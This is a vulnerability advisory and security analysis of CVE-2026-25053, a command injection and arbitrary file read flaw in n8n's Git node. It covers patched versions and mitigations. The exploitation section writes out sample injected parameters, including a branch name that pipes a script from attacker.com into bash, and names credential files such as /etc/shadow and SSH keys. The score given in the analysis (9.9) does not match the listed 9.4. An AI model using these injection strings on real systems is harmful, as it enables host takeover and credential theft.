CVE-2026-25053
CVE-2026-25053
9.4
CriticalPublished:
Last updated:
Source:security-advisories@github.com
Analyzed
Weakness (CWE)
CVSS Vector
v4.0- Attack Vector
- Network
- Attack Complexity
- Low
- Attack Requirements
- None
- Privileges Required
- Low
- User Interaction
- None
- Confidentiality (Vulnerable)
- High
- Integrity (Vulnerable)
- High
- Availability (Vulnerable)
- High
- Confidentiality (Subsequent)
- High
- Integrity (Subsequent)
- High
- Availability (Subsequent)
- High
Description
n8n is an open source workflow automation platform. Prior to versions 1.123.10 and 2.5.0, vulnerabilities in the Git node allowed authenticated users with permission to create or modify workflows to execute arbitrary system commands or read arbitrary files on the n8n host. This issue has been patched in versions 1.123.10 and 2.5.0.
CVE-2026-25053: Professional Cybersecurity Analysis
Executive Summary
CVE-2026-25053 represents a critical security vulnerability in n8n workflow automation platform with a CVSS score of 9.9, indicating severe risk. The vulnerability enables authenticated users with workflow creation/modification privileges to execute arbitrary system commands and read arbitrary files on the host system through the Git node component.
1. Vulnerability Assessment and Severity Evaluation
Severity Classification
- CVSS Score: 9.9 (Critical)
- Attack Complexity: Low
- Privileges Required: Low (authenticated user with workflow permissions)
- User Interaction: None
- Scope: Changed (impacts resources beyond the vulnerable component)
Risk Analysis
The vulnerability represents a command injection and arbitrary file read vulnerability with the following characteristics:
- Confidentiality Impact: HIGH - Arbitrary file read capability exposes sensitive system files, credentials, and configuration data
- Integrity Impact: HIGH - Arbitrary command execution allows system modification, malware installation, and data manipulation
- Availability Impact: HIGH - Attackers can disrupt services, delete critical files, or crash systems
The 9.9 CVSS score is justified due to:
- Potential for complete system compromise
- Lateral movement opportunities within infrastructure
- Data exfiltration capabilities
- Privilege escalation potential from application to system level
2. Attack Vectors and Exploitation Methods
Primary Attack Vectors
A. Authenticated Insider Threat
Scenario: Malicious or compromised authenticated users with workflow permissions
- Direct exploitation through workflow creation interface
- Minimal technical sophistication required
- Immediate access to vulnerable functionality
B. Account Compromise Chain
Scenario: External attacker compromises low-privilege account
- Initial access via phishing, credential stuffing, or other authentication bypass
- Escalation to workflow creation privileges
- Exploitation of Git node vulnerability
- System-level command execution
C. Supply Chain Attack
Scenario: Malicious workflow templates or shared workflows
- Import of compromised workflow definitions
- Execution of embedded malicious Git node configurations
- Automated exploitation upon workflow activation
Exploitation Methodology
Command Injection Exploitation
Likely attack pattern:
1. Create/modify workflow with Git node
2. Inject shell metacharacters in Git parameters:
- Repository URL: `https://example.com/repo.git; malicious_command`
- Branch name: `main && curl attacker.com/shell.sh | bash`
- Commit message: `$(whoami > /tmp/pwned)`
3. Execute workflow to trigger command injection
4. Establish persistence and lateral movement
Arbitrary File Read Exploitation
Potential exploitation vectors:
1. Path traversal in Git node file operations
2. Reading sensitive files:
- /etc/passwd, /etc/shadow
- ~/.ssh/id_rsa (SSH keys)
- Application configuration files with credentials
- Database connection strings
- API keys and tokens
3. Exfiltration through workflow outputs or external callbacks
Post-Exploitation Activities
- Credential Harvesting: Extract database credentials, API keys, cloud provider credentials
- Lateral Movement: Use compromised system as pivot point
- Data Exfiltration: Access and extract sensitive workflow data, customer information
- Persistence: Install backdoors, create additional user accounts
- Ransomware Deployment: Encrypt critical business data
3. Affected Systems and Software Versions
Vulnerable Versions
- n8n versions < 1.123.10 (Version 1.x branch)
- n8n versions < 2.5.0 (Version 2.x branch)
Affected Components
- Git Node: Primary vulnerable component
- Workflow Execution Engine: Facilitates exploitation
- Backend API: Processes malicious workflow definitions
Deployment Scenarios at Risk
High-Risk Deployments
-
Multi-tenant SaaS Environments
- Shared infrastructure increases blast radius
- Cross-tenant contamination risk
-
Enterprise Self-Hosted Installations
- Access to corporate networks and resources
- Integration with critical business systems
-
Cloud-Hosted Instances
- Access to cloud provider metadata services
- Potential for cloud account compromise
-
Containerized Deployments
- Container escape possibilities
- Access to orchestration layer (Kubernetes, Docker)
Infrastructure Components at Risk
- Host operating systems (Linux, Windows, macOS)
- Container runtime environments
- Connected databases and data stores
- Integrated third-party services
- Network infrastructure accessible from n8n host
4. Recommended Mitigation Strategies
Immediate Actions (Priority 1 - Within 24 Hours)
A. Patch Deployment
Critical Action: Upgrade immediately to patched versions
- Version 1.x users: Upgrade to 1.123.10 or later
- Version 2.x users: Upgrade to 2.5.0 or later
Verification:
- Check current version: n8n --version
- Review release notes for breaking changes
- Test in staging environment if possible
- Deploy to production with rollback plan
B. Emergency Access Controls
- Audit Workflow Permissions: Review and restrict users with workflow creation/modification rights
- Implement Least Privilege: Remove unnecessary workflow permissions
- Disable Git Node: If not required, disable Git node functionality temporarily
- Enable Audit Logging: Activate comprehensive logging for workflow activities
C. Threat Hunting
Investigation checklist:
1. Review workflow execution logs for suspicious Git node usage
2. Examine system logs for unexpected command executions
3. Check for unauthorized file access patterns
4. Analyze network traffic for data exfiltration
5. Review user account activities for anomalies
6. Inspect recent workflow modifications
Short-Term Mitigations (Priority 2 - Within 1 Week)
A. Network Segmentation
- Isolate n8n instances in dedicated network segments
- Implement strict egress filtering
- Block unnecessary outbound connections
- Deploy web application firewall (WAF) rules
B. Enhanced Monitoring
Implement detection rules:
- Alert on Git node usage patterns
- Monitor for shell metacharacters in workflow parameters
- Detect unusual file system access
- Track privilege escalation attempts
- Monitor for lateral movement indicators
C. Access Control Hardening
- Implement multi-factor authentication (MFA)
- Enforce strong password policies
- Regular access reviews and recertification
- Implement role-based access control (RBAC)
- Session timeout configurations
Long-Term Strategic Mitigations (Priority 3 - Ongoing)
A. Security Architecture Improvements
- Containerization with Restrictions: Deploy with minimal privileges, read-only file systems
- Sandboxing: Implement execution sandboxes for workflow nodes
- Input Validation Framework: Comprehensive validation for all node parameters
- Security Scanning: Integrate SAST/DAST in CI/CD pipeline
B. Operational Security Enhancements
Establish security program:
1. Regular vulnerability assessments
2. Penetration testing of n8n deployments
3. Security awareness training for users
4. Incident response procedures specific to workflow automation
5. Backup and recovery testing
6. Supply chain security for workflow templates
C. Compensating Controls
- Command Execution Monitoring: Deploy EDR/XDR solutions
- File Integrity Monitoring: Detect unauthorized file modifications
- Behavioral Analytics: Identify anomalous workflow execution patterns
- Immutable Infrastructure: Use infrastructure-as-code with version control
5. Impact on Cybersecurity Landscape
Industry-Wide Implications
A. Workflow Automation Security Concerns
This vulnerability highlights systemic risks in low-code/no-code platforms:
- Trust Boundary Issues: Authenticated users shouldn't have system-level access
- Input Validation Gaps: Insufficient sanitization in automation platforms
- Privilege Escalation Risks: Application-to-system privilege escalation patterns
B. Supply Chain Considerations
- Third-Party Integration Risks: Workflow platforms integrate with numerous services
- Shared Workflow Risks: Community-shared workflows may contain malicious code
- Dependency Chain Vulnerabilities: Complex dependency trees in automation platforms
Threat Actor Interest
References
security-advisories@github.com
https://github.com/n8n-io/n8n/security/advisories/GHSA-9g95-qf3f-ggrw